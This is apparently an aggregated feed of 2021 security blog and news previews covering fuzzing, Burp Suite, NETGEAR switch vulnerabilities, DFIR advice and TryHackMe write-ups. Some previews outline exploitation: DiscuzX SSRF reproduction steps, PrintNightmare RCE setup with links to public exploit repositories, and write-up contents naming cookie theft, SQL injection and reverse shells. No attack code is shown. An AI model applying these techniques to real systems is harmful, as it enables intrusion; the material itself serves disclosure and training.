    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )

  • Open

    JavaScript Test Case Generator Based on Branch Coverage and Fuzzing
    Article URL: https://slashdot.org/submission/14707493/javascript-test-case-generator-based-on-branch-coverage-and-fuzzing Comments URL: https://news.ycombinator.com/item?id=28745108 Points: 1 # Comments: 1  ( 3 min )

  • Open

    /r/netsec's Q4 2021 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]  ( 26 min )

  • Open

    Google's Beginner Quest 2021 - all tasks solved recording
    Google CTF nowadays is a pretty large event - or should I say 3 connected events, with the pretty hardcore main CTF being one of them, and Hackceler8 - where speedrunning meets CTFs and game hacking - being the second. The last one, but probably the most popular one is Beginners Quest - a set of CTF challenges tied together with a story (a 001337 spy story in this specific case) and aimed at folks who like challenges, but prefer to take it easy is a stress free (i.e. no scoreboard) environment. Anyway, yesterday I've made an over 4 hour long livestream where I've solved all the challenges from this year's BQ, and here's the recording - enjoy! Timeline (in order of solving): 15:46 - Task 1: CCTV (rev) 23:38 - Task 2: Logic Lock (misc) 34:27 - Task 3: High Speed Chase (misc) 49:25 - Task 5: Twisted robot (misc) 1:07:50 - Task 8: Hide and seek (misc) 1:22:10 - Task 10: Spycam (hw) 1:47:15 - Task 12: Old lock (web) 1:55:47 - Task 13: Noise on the wire (net) 2:04:45 - Task 15: Just another keypad (rev) 2:14:48 - Task 17: Playing golf (misc) 3:01:08 - Task 18: Strange Virtual Machine (rev) 3:41:49 - Task 4: Electronics Research Lab (hw) 3:51:41 - Task 6: To the moon (misc) 4:16:40 - Task 7: ReadySetAction (crypto) 4:25:30 - Task 9: Konski-Hiakawa Law of Droids (rev) 4:28:23 - Task 11: pwn-notebook (pwn) 4:41:59 - Task 14: web-quotedb (web) 4:45:04 - Task 16: Hash-meee (misc)

  • Open

    Helping users explore the web and continue prior tasks
    When you’re looking for a certain piece of information or working on a project, your path through the internet likely isn’t a linear one. You might search for the same thing multiple times, jump between pages, head back to Google Search again, or parse through your history for that one page you can’t seem to find again. It can be challenging, and more importantly, it can take up time that you could be using to get things done. Now, we’re kicking off two new experiments with the goal of making it easier to navigate, explore and keep track of the things you find on the web. Continue your explorations of the web If you’ve already started exploring a topic and visited multiple sites along the way over a number of days or weeks, chances are you’ve found helpful information you might want to …

  • Open

    Burp Suite Professional: feature roundup
    The modern web is an increasingly complex beast. Each passing year brings with it new frameworks, technologies, and design trends - not to mention vulnerabilities. All of this adds to your testing wor  ( 6 min )
  • Open

    Burp Suite Professional: feature roundup
    The modern web is an increasingly complex beast. Each passing year brings with it new frameworks, technologies, and design trends - not to mention vulnerabilities. All of this adds to your testing wor  ( 6 min )

  • Open

    Training XSS Muscles
    XSS is all about practice. It requires a lot of time to print in the mind all vectors, payloads and tricks at our disposal. There are lots of XSS cases, each one requiring a different approach and construct to pop the alert box. Thinking on that and following the previous XSS Test Page released with … Continue reading Training XSS Muscles The post Training XSS Muscles appeared first on Brute XSS.
  • Open

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )
  • Open

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )
  • Open

    实例分析 DiscuzX 3.4 SSRF漏洞
    0x00 漏洞信息简介              Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来,Discuz!已拥有15年以上的应用历史和200多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。目前最新版本Discuz! X3.4正式版于2017年8月2日发布,去除了云平台的相关代码,是 X3.2 的稳定版本。此次漏洞位于/source/module/misc/misc_imgcropper.php中的54行处的$prefix可控导致SSRF。文章参考:Discuz x3.4 前台 SSRF 分析[1]。该漏洞公开时间为2018年12月3日,文章地址为:Discuz x3.4前台SSRF[2],由于该文章存在密码,可以查看转载地址:文章转载地址[3]   0x01 漏洞详情分析  Discuz开源地址为Gitee[4],使用git clone 克隆到本地 [crayon-6267516ac638c411795395/] 根据补丁提交记录[5]来切换到漏洞修复前的前一个commit版本 [crayon-6267516ac6393795508771/] 本地搭建好运行环境之后首先访问页面http://www.a.com/dz/DiscuzX/upload/misc.php?mod=imgcropper,然后点击裁切按钮并抓包 拦截之后重放数据包在提交内容位置添加参数cutimg和picflag,红框处填写需要请求的IP地址并发送数据包 [crayon-6267516ac6395784063987/] 这时服务器将成功收到请求 下面来看看后端是…

  • Open

    Imposter Syndrome
    Imposter Syndrome.  This is something many of us have experienced to one degree or another, at various times. Many have experienced, some have overcome it, others may not be able to and wonder why. HealthLine tells us, "Imposter feelings represent a conflict between your own self-perception and the way others perceive you." I would modify that slight to, "...the way we believe others perceive us." Imposter syndrome is something internalized, and has very little to do with the outside world. I wanted to take the opportunity to share with you, the reader, what I've learned over the years about what's really happening in the world when we're having those feelings of imposter syndrome. Perception: I don't want to present at a conference, or ask a question at a conference, because everyone know…  ( 6 min )

  • Open

    Chrome 95 Beta: Secure Payment Confirmation, WebAssembly Exception Handling and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 95 is beta as of September 23, 2021. Origin Trials This version of Chrome introduces the origin trials described below. Origin trials allow you to try new features and give feedback on usability, practicality, and effectiveness to the web standards community. To register for any of the origin trials currently supported in Chrome, including the ones described below, visit the Chrome Origin Trials dashboard. To learn more about origin trials in Chrome, visit the Origin Trials Guide for Web Developers. Microsoft Edge runs its own origi…

  • Open

    Dev.fuzz (fuzzing) merged in Golang tip
    Article URL: https://github.com/golang/go/commit/6e81f78c0f1653ea140e6c8d008700ddad1fa0a5 Comments URL: https://news.ycombinator.com/item?id=28604475 Points: 2 # Comments: 0  ( 7 min )
    Native fuzzing will be in Go 1.18
    Article URL: https://twitter.com/katie_hockman/status/1440082486692773897 Comments URL: https://news.ycombinator.com/item?id=28602233 Points: 1 # Comments: 0  ( 1 min )

  • Open

    Building a More Secure AppDev Process
    Enterprises that integrate security testing into their CI/CD pipeline fix 91.4 percent of new issues, according to a progress report from ShiftLeft. Recent software supply chain attacks illustrate the growing risks businesses, their partners, and customers face. But a recent report suggests better outcomes for those who put security at the heart of app development. Data from […] The post Building a More Secure AppDev Process appeared first on Security Weekly.  ( 2 min )
  • Open

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )
  • Open

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )

  • Open

    Distros and RegRipper
    Over the years, every now and then I've taken a look around to try to see where RegRipper is used. I noticed early on that it's included in several security-oriented Linux distros. So, I took the opportunity to compile some of the links I'd found, and I then extended those a bit with some Googling. I will admit, I was a little surprised to see how, over time, how far RegRipper has gone, from a "here, look at this" perspective. Not all of the below links are current, some are several years old. As such, they are not the latest and greatest; however, they may still apply and they may still be useful/valuable. RegRipper on Linux (Distros)  Kali, Kali GitLab  SANS SIFT  CAINE   Installing RegRipper on Linux  Install RRv2.8 on Ubuntu  CentOS RegRipper package  Arch Linux   RegRipper Docker Imag…  ( 5 min )
    On Writing DFIR Books, pt II
    Part I of this series kicked things off for us, and honestly I have no idea how long this series will be...I'm just writing the posts without a specific plan or outline for the series. In this case, I opted to take an organic approach, and wanted to see where it would go. Content Okay, so you have an idea for a book, but about...what? You may have a title or general idea, but what's the actual content you intend to write about? Is it more than a couple of paragraphs; can you actually create several solid chapters without having to use a lot of filler and fluff? Back when I was actively writing books, this was something on the forefront of my mind, not only because I was writing books, but later I got a question or two from others along these lines. In short, I write about stuff I know, or …  ( 5 min )

  • Open

    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
  • Open

    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )
  • Open

    User-Agent Reduction Origin Trial and Dates
    Back in May, we published an update on our User-Agent string reduction plans with a promise to publish further details on timing. Now that we have an origin trial ready for testing the Reduced User-Agent header (and associated JS interfaces) we have estimated timelines to share. What follows is repeated from the original blog post, but contains estimated Chrome versions where these Phases will begin to help you prepare.  The Chromium schedule dashboard will be useful for understanding dates associated with each Chrome version and its progression from Canary into Beta and Stable Release. Note: The usual disclaimers about estimating engineering deadlines apply—unforeseen circumstances may dictate delays. But in the case that we encounter delays, we do not intend to accelerate timelines bet…
  • Open

    [译] 基于角色的访问控制(RBAC):演进历史、设计理念及简洁实现(Tailscale, 2021)
    译者序 本文翻译自 2021 年的一篇英文博客: RBAC like it was meant to be。 很多系统(例如 Kubernetes、AWS)都在使用某种形式的 RBAC 做权限/访问控制。 本文基于 access control 的发展历史,从设计层面分析了 DAC -> MAC -> RBAC -> ABAC的演进历程及各模型的优缺点、适用场景等, 然后从实际需求出发,一步步地设计出一个实用、简洁、真正符合 RBAC 理念的访问控制系统。 作为对比,如果想看看表达能力更强(但也更复杂)的 RBAC/ABAC 系统是什么样子,可以研究一下 AWS 的访问控制模型。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 1 从 DAC 到 MAC 1.1 DAC(自主访问控制):各文件 owner 自主设置文件权限 设计 使用场景:普通用户的文件权限控制 1.2 MAC(强制访问控制):(强制由)专门的 admin 设置文件权限 设计:DAC 基础上引入专门的 admin 角色 例子:TCP/UDP 端口号 适用场景:文档/系统访问控制 1.3 MAC 之双因素登录(two-factor login as MAC) 1.4 图片分享:DAC/MAC 模型比较 1.5 MAC 概念:限制太多,又好像没什么限制 2 第一次尝试:基于 RBAC/ABAC 2.1 RBAC(基于角色的访问控制) 2.2 ABAC(基于属性的访问控制) 2.3 也许你从未用过真正的 RBAC Windows 文件安全模型:每个文件一个 ACL 控制谁能访问哪个文件 2.4 存在的问题:ACL 太多,到处重复,批量修改麻烦 3 第二次尝试:每个 ACL 对应一个用户组 3.1 仍…

  • Open

    Account Persistence – Certificates
    It is not uncommon organizations to implement an internal certification authority in order to establish trust between entities (users, computers etc.) or utilize it for… Continue reading → Account Persistence – Certificates  ( 7 min )
  • Open

    Account Persistence – Certificates
    It is not uncommon organizations to implement an internal certification authority in order to establish trust between entities (users, computers etc.) or utilize it for… Continue reading → Account Persistence – Certificates  ( 7 min )
  • Open

    Seventh Inferno vulnerability (some NETGEAR smart switches)
    <img src="https://gynvael.coldwind.pl/img/seventh-inferno-small.jpg" alt="Name of the vulnerability - Seventh Inferno - in a flaming font on dark rocky background" class="banner-fill"> TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. P.S. This vulnerability and exploit chain is actually quite interesting technically. In short, it goes from a newline injection in the password field, through being able to write a file with constant uncontrolled content of 2 (like, one byte 32h), through a DoS and session crafting (which yields an admin web UI user), to an eventual post-auth shell injection (which yields full root). …

  • Open

    Tips for DFIR Analysts, pt II
    On the heels of my first post with this subject, I thought I'd continue adding tips as they came to mind... I've been engaged with EDR frameworks for some time now. I first became aware of Carbon Black before it was "version 1.0", and before "carbonblack.com" existed. Since then, I've worked for several organizations that developed EDR frameworks (Secureworks, Nuix, CrowdStrike, Digital Guardian), and others that made use of frameworks created by others. I've also been very happy to see the development and growth of Sysmon, and used it in my own testing. One thing I've been acutely aware of is the visibility afforded by EDR frameworks, as well as the extent of that visibility. This is not a knock against these tools...not at all. EDR frameworks and tools are incredibly powerful, but they a…  ( 5 min )
    On Writing DFIR Books, pt I
    During my time in the industry, I've authored 9 books under three imprints, and co-authored a tenth. There, I said it. The first step in addressing a problem is admitting you have one. ;-) Seriously, though, this is simply to say that I have some experience, nothing more. During the latter part of my book writing experience, I saw others who wanted to do the same thing, but ran into a variety of roadblocks, roadblocks I'd long since navigated. As a result, I tried to work with the publisher to create a non-paid liaison role that would help new authors overcome many of those issues, so that a greater portfolio of quality books became available to the industry. By the time I convinced one editor of the viability and benefit of such a program, they had decided to leave their profession, and I…  ( 7 min )
  • Open

    Draconian Fear vulnerability (some NETGEAR smart switches)
    <img src="https://gynvael.coldwind.pl/img/draconian-fear-small.jpg" alt="Name of the vulnerability - Draconian Fear - in a red horror-style font on stained black background" class="banner-fill"> TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. Note: Details on Seventh Inferno will be publish on or after 13th September. Affected devices: GC108P GC108PP GS108Tv3 GS110TPP GS110TPv3 GS110TUP GS308T GS310TP GS710TUP GS716TP GS716TPP GS724TPP GS724TPv2 GS728TPPv2 GS728TPv2 GS750E GS752TPP GS752TPv2 MS510TXM MS510TXUP …
    Demon's Cries vulnerability (some NETGEAR smart switches)
    <img src="https://gynvael.coldwind.pl/img/demons-cries-small.jpg" alt="Name of the vulnerability - Demon's Cries - in a white horror-style font on stained bluish gray background" class="banner-fill"> TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. Note: Details on Seventh Inferno will be publish on or after 13th September. Affected devices: GC108P GC108PP GS108Tv3 GS110TPP GS110TPv3 GS110TUP GS308T GS310TP GS710TUP GS716TP GS716TPP GS724TPP GS724TPv2 GS728TPPv2 GS728TPv2 GS750E GS752TPP GS752TPv2 MS510TXM MS510…

  • Open

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »
  • Open

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »

  • Open

    OSInt, Doxing And Cyberstalking Page Updated
    Link: http://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking I added (https://usersearch.org) to the site. I also moved dead links to the bottom of the page. If you know sites/tools I should add, please contact me. The site has gotten a bit dated I think.

  • Open

    Web App and API Security Needs to Be Modernized: Here’s How
    Applications are critical for doing business. They are also the weakest links in many an organization’s security chain. Many APIs continue to expose the personally identifiable information of customers, employees and contractors. As OWASP (Open Web Application Security Project) notes on its API Security Project homepage: “By nature, APIs expose application logic and sensitive data […] The post Web App and API Security Needs to Be Modernized: Here’s How appeared first on Security Weekly.  ( 2 min )

  • Open

    Building a Career in CyberSecurity
    There's been a lot of discussion on social media around how to "break into" the cybersecurity field, not only for folks just starting out but also for those looking for a career change. This is not unusual, given what we've seen in the public news media around cyber attacks and ransomware; the idea is that cybersecurity is an exploding career field that is completely "green fields", with an incredible amount of opportunity. Jax Scott recently shared a YouTube video (be sure to comment and subscribe!) where she provides five steps to level up any career, based on her "must read for anyone seeking a career in cybersecurity" blog post. Jax makes a lot of great points, and rather than running through each one and giving my perspective, I thought I'd elaborate a bit on one in particular. Jax's …  ( 4 min )

  • Open

    Chrome 94 Beta: WebCodecs, WebGPU, Scheduling, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 94 is beta as of August 26, 2021. WebCodecs Existing media APIs (HTMLMediaElement, Media Source Extensions, WebAudio, MediaRecorder, and WebRTC) are high-level and narrowly-focused. A low-level codec API would better support emerging applications, such as latency-sensitive game streaming, client-side effects or transcoding, and polyfillable media container support, without the increased network and CPU cost of JavaScript or WebAssembly codec implementations. The WebCodecs API eliminates these deficiencies by giving programmers a w…
  • Open

    Tips for DFIR Analysts
    Over the years as a DFIR analyst...first doing digital forensics analysis, and then incorporating that analysis as a component of IR activity...there have been some stunningly simple truths that I've learned, truths that I thought I'd share. Many of these "tips" are truisms that I've seen time and time again, and recognized that they made much more sense and had more value when they were "named". Tips, Thought, and Stuff to Think About Computer systems are a finite, deterministic space. The adversary can only go so far, within memory or on the hard drive. When monitoring computer systems and writing detections, the goal is not write the perfect detection, but rather to force the adversary into a corner, so that no matter what they do, they will trigger something. So, it's a good thing to…  ( 9 min )
  • Open

    Burp extensions added to Burp Suite Enterprise Edition
    Burp Extensions (and your own custom extensions) will now be supported by Burp Suite Enterprise Edition, brand new for the 2021.8 release. If you've had much experience with Burp Suite Professional, i  ( 5 min )
  • Open

    Burp extensions added to Burp Suite Enterprise Edition
    Burp Extensions (and your own custom extensions) will now be supported by Burp Suite Enterprise Edition, brand new for the 2021.8 release. If you've had much experience with Burp Suite Professional, i  ( 5 min )

  • Open

    It's now easier than ever to scan at scale with Burp Suite Enterprise Edition
    774 organizations in 68 countries are now using Burp Suite Enterprise Edition to improve and scale security across their web portfolios. As we pass the three-year anniversary of development on Burp Su  ( 4 min )
  • Open

    It's now easier than ever to scan at scale with Burp Suite Enterprise Edition
    774 organizations in 68 countries are now using Burp Suite Enterprise Edition to improve and scale security across their web portfolios. As we pass the three-year anniversary of development on Burp Su  ( 4 min )

  • Open

    A New Attack Surface on MS Exchange Part 3 - ProxyShell!
    No content preview

  • Open

    The history of OAST in Burp Suite
    At PortSwigger, we pride ourselves on pushing the boundaries of web security. Just take a peek at some of our researchers' recent and upcoming talks from the likes of Black Hat and DEF CON if you'd li  ( 4 min )
  • Open

    Domain Escalation – PrintNightmare
    Printers are part of every corporate infrastructure therefore Windows environments they have a number of embedded drivers installed. The Print Spooler (spoolsv.exe) service is responsible… Continue reading → Domain Escalation – PrintNightmare  ( 5 min )

  • Open

    A New Attack Surface on MS Exchange Part 1 - ProxyLogon!
    No content preview
    A New Attack Surface on MS Exchange Part 2 - ProxyOracle!
    No content preview

  • Open

    Making numbers out of thin air, Python bytecode edition
    div#pydemo { display: flex; flex-direction: column; font-size: 1.4em; } .dup { color: #0f0; } div.pydemotop { display: flex; flex-direction: row; padding-top: 0.5em; padding-bottom: 0.5em; background-color: #2a2855; } div.pydemobottom { display: flex; flex-direction: row; min-height: 25em; } div#pynum { width: 50%; } div#pynum input { width: 100%; text-align: center; font-size: 1em; background-color: #2a2855; color: white; border: none; padding-top: 0.5em; padding-bottom: 0.5em; } div#pyast { background-color: #2a2855; width: 50%; text-align: center; } div#pyastvalue { padding-top: 0.5em; padding-bottom: 0.5em; color: white; } div#pystackbefore { padding-top: 0.5em; back…

  • Open

    Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
    近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 漏洞复现 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基于Windows server 2019,2021-6补丁的,winver=17763.1999。经笔者测试在无任何补丁的Windows server 2019,winver=17763.107环境下使用以下步骤也可以复现RCE。 环境配置 实现RCE的条件如下: 1.一个普通权限的域账户,用另一台计算机使用该域账户登录加入域环境。其中域账户权限如下 2.域控主机需要能够访问到使用上述配置登录的计算机的一个共享目录,在Windows下可以使用smb实现,用管理员权限的powershell运行以下命令即可 [crayon-6267516ac7e1a324360281/] 运行完命令重启生效。 复现 GitHub上有2个公开的exp,python版本的https://github.com/cube0x0/CVE-2021-1675 和C++版本的https://github.com/afwu/PrintNightmare ,其中C++版本的是从Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)公开的exp fork来的。 这两个版本的exp原理都是一样的,也都是可用的,其中python版本的exp需要按照说明文档安装…

  • Open

    OISF 2021 Videos
    OISF 2021 Videos These are the videos from the OISF Anniversary Event Opening Remarks OISF President Inside the Mind of a Threat Actor: Beyond Pentesting Phillip Wylie I Got 99 Problems but a WAF ain't one Micah Brown Code Hedgehogs - Changing the "S" in SDLC to Secure Penelope Rozhkova A Look at Cellular Services in IoT technology Deral Heiland Chats, Cheats, and Cracks: Abuse of Collaboration Platforms in Malware Campaigns Edmund Brumaghin Lend me your IR's! Matt Scheurer Download from: https://archive.org/details/oisf2021

  • Open

    ClickMeeting minor privacy weakness (fixed)
    Just a short reminder to anonymize data on the server-side and not in the browser, illustrated by a small privacy vulnerability I've found during, well, a security talk I've attended that took place on the ClickMeeting platform (it was still 10 minutes before the talk began you understand). Props to ClickMeeting for a fast reaction time and good communication - this bug is long fixed (reported on April 7th 2021). Original report (though redacted a bit) follows: Hey folks, I've joined a webinar hosted on clickmeeting platform today, and noticed one thing which I found curious. The webinar I attended had chat enabled, however there seem to be some "privacy mode" enabled for attendees - i.e. the chat didn't display the list of people (which is pretty standard…

  • Open

    popen+cat explained
    A few days ago I tweeted about this "open and read a file with popen+cat" gem I found in the firmware of one of NETGEAR's devices: How to read a file in C according to NETGEAR pic.twitter.com/TRbxWC5vsY — Gynvael Coldwind (@gynvael) July 1, 2021 Since there were some questions about "why is this a bad pattern?", I decided to write a short blog post explaining this. But before we get there, please also see this short thread, or just remember to not blame an individual engineer for writing that code – rather blame the procedures NETGEAR has with regards to secure code development and quality assurance. Context? Let's start by adding some more context to this tweet – where is this code from, and is it the source code or something else? This code was found in the firm…

  • Open

    Gears of Chaos vulnerability chain (NETGEAR WAC104 access point)
    <img src="https://gynvael.coldwind.pl/img/gears-of-chaos-small.png" alt="Name of the vulnerability - Gears of Chaos - in a black horror-style font on stained white-and-black background" style="width:100%; height: auto; margin: 0; margin-bottom: 0.5em"> As mentioned in previous post, NETGEAR WAC104 access point just had a couple of vulnerabilities patched and you should upgrade its firmware now if you own such a device at your company or at home (or anywhere else). <img src="https://gynvael.coldwind.pl/img/wac104_t.jpg" alt="Photo of a NETGEAR WAC104 access point without the casing."> NETGEAR WAC104 access point Actually there might be more affected devices: WAC104 - fix available WNDR3700v5 - might be vulnerable (unconfirmed), …

  • Open

    WAC104 vulnerabilities - please go patch (details on Monday)
    Just a short post (I will publish a longer one with details on Monday) – if you have the following NETGEAR access point, you should upgrade your firmware now: WAC104 NETGEAR's advisory and the firmware can be found here: Security Advisory for Authentication Bypass on WAC104, PSV-2021-0075 WAC104 — Dual Band 802.11ac Wireless Access Point – Firmware and Software Downloads Please note that NETGEAR assigned CVSS v3.1 score of 8.8 (High), which is incorrect (unless I misread the CVSS specification) - it's actually 9.8 (Critical): Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H This firmware fixes also a couple of other vulnerabilities with lower CVSS scores. More details on Monday. P.S. This vulnerability chain is dubbed Gears of Chaos (in line with my sense of humor).

  • Open

    BSides Cleveland 2021 Videos
    BSides Cleveland 2021 Videos These are the videos from the Bsides Cleveland conference. Thanks to Rich, securid as the video team. Thanks to twuntymcslore & RockieBrockway for being con mom & dad. These are the first con recordings I've done in 1 year and 3 months. It seems something may have changed after some updates. These OBS videos have variable audio sync problems that are not a set number of milliseconds I could easily set the same sync settings to. I fixed them the best I could, but I've included the raw files if someone can figure a better way to fix variable sync delays. Contact me if you find a better way. Ministraitor (my European counterpart that does more cons than me) gave me some tips to fix future problems. Intro Rockie Brockway I Don t Know Snow Computer Forensics Case Files Tyler Hudak Improving Cyber Security Alex Kot Lend Me You IRs Matt Scheurer Tale From The Audit Justin Leapline Table Top Jeremy Mio Vulnerability Disclosure Policies Hack Responsibly MzBat Pentest Stories Justin Bollinger Advisor Person Rick Yocum

  • Open

    TryHackMe > Unbaked Pie
    Don’t over-baked your pie! Please allow 5 minutes for this instance to fully deploy before attacking. This VM was developed in collaboration with @ch4rm, thanks to him for the foothold and privilege escalation ideas. Contents 1 User Flag 1.1 Services 1.2 Django application 1.3 Pickle in the search 1.4 Exploit 1.5 Evade docker 1.6 Database 1.7 Brute force ramsey’s SSH account 1.8 Ramsey’s flag 2 Root Flag 2.1 Lateral move (ramsey -> oliver) 2.2 Privilege escalation User Flag Services Running Nmap will only reveal 1 open port: PORT STATE SERVICE VERSION 5003/tcp open filemaker? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Sat, 05 Jun 2021 05:28:13 GMT | Server: WSGIServer/0.2 CPython/3.8.6…

  • Open

    TryHackMe > Cooctus Stories
    This room is about the Cooctus Clan. Previously on Cooctus Tracker Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01) Present times Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it’s your objective to uncover their plans. Note: A stable shell is recommended, so try and SSH into users when possible. Con…
    TryHackMe > VulnNet Roasted
    VulnNet Entertainment quickly deployed another management instance on their very broad network… VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing. Difficulty: Easy Operating System: Windows This is a much simpler machine, do not overthink. You can do it by following common methodologies. Note: It might take up to 6 minutes for this machine to fully boot. Author: TheCyb3rW0lf Discord: TheCyb3rW0lf#8594 Icon made by DinosoftLabs from www.flaticon.com Contents 1 What is the user flag? (Desktop.txt) 1.1 Services 1.2 Samba 1.3 Find users 1.4 Find users without K…

  • Open

    TryHackMe > VulnNet Internal
    VulnNet Entertainment learns from its mistakes, and now they have something new for you… VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings. Difficulty: Easy/Medium Operating System: Linux This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags. Note: It might take …

  • Open

    TryHackMe > toc2
    It’s a setup... Can you get the flags in time? I have a theory that the truth is never told during the nine-to-five hours. - Hunter S. Thompson Contents 1 Find and retrieve the user.txt flag 1.1 Services 1.2 CMS information 1.3 CMS Made Simple / Reverse Shell 1.4 User flag 2 Escalate your privileges and acquire root.txt 2.1 Lateral move (www-data -> frank) 2.2 The readcreds binary 2.3 Race condition 2.4 Root flag Find and retrieve the user.txt flag Services Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA) | 256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA) …

  • Open

    TryHackMe > The Marketplace
    Can you take over The Marketplace’s infrastructure? The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team has been working on. He said it still has a few bugs he and his team need to iron out. Can you take advantage of this and will you be able to gain root access on his server? Contents 1 What is flag 1? 1.1 Services 1.2 Web application 1.3 Token cookie 1.4 XSS vulnerability 1.5 Stealing the admin cookie 2 What is flag 2? (User.txt) 2.1 SQLi vulnerability 2.2 Exploit the SQL injection 2.2.1 Database and tables 2.2.2 Users table 2.2.3 Messages table 2.3 Connect as jake 3 What is flag 3? (Root.txt) 3.1 Lateral move (jake -> michael) 3.…

  • Open

    FAQ: Difference between vulnerability, exploit and CVE
    Obligatory FAQ note: Sometimes I get asked questions, e.g. on IRC, via e-mail or during my livestreams. And sometimes I get asked the same question repeatedly. To save myself some time (*cough* and be able to give the same answer instead of conflicting ones *cough*) I decided to write up selected question and answer pairs in separate blog posts. Please remember that these answers are by no means authoritative - they are limited by my experience, my knowledge and my opinions on things. Do look in the comment section as well - a lot of smart people read my blog and might have a different, and likely better, answer to the same question. If you disagree or just have something to add - by all means, please do comment. Q: How to find exploits in software? Q: How did you find this CVE? (in …

  • Open

    TryHackMe > Debug
